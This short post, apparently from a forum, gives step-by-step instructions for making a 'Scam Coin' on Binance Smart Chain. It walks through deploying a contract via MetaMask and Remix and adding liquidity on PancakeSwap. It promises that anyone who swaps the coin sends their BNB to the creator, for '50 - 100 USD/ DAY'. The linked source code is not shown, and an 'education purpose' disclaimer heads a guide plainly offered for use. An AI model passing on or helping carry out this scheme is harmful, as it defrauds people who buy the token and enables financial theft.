

**** It Only For Education Purpose *****

- Making a Scam Coin, transfer others BNB back to your contract address. Work on Balance Smart Chain. Making 50 - 100 USD/ DAY.

Metamask :


Connect MetaMask to Binance Smart Chain : 


OR add via:


Remix -


Source Code: (Jul 24, 2022 ) Updated Detail:

- Uniswap Side Manager to Pancakeswap Original Manager .

Link 1 - 


Link 2 - (Backup) 


Note: Better transfer More Than 0.5 BNB or for Provide Liquidity, lower than 0.5 BNB is not able to view the trading chart on pancakeswap swap page.

This code is Run on Injected Web3 Source.

You just have to follow step:

1. Install MetaMask, Deposit Some BNB (Deploy Contract Gas Fee)

2. Open Remix, Create New File call metaverse.sol

3. Open the Source Link, Copy and Paste the Code in metavserse.sol

4. Compile metaverse.sol

5. Deploy Setting: 

1) ENVIRONMENT: Injected Web3

2) Account: Your Metamask Wallet

3) Contract: metaverse.sol

6. Deploy it

7. Transfer More Than 1 BNB for Provide Liquidity. 

8. Push the action button to active on pancakeswap.

9. Add the Coin on your metamask wallet.

10. Import your coin on pancakeswap setting.

11. Finish.

**** Important*****

If The Contract is Not Show on Pancakeswap, It is require more liquidity and push action button again.

Everyone To swap Your Coin on pancakeswap would Automatic Transfer their BNB coin to your Contract Wallet.

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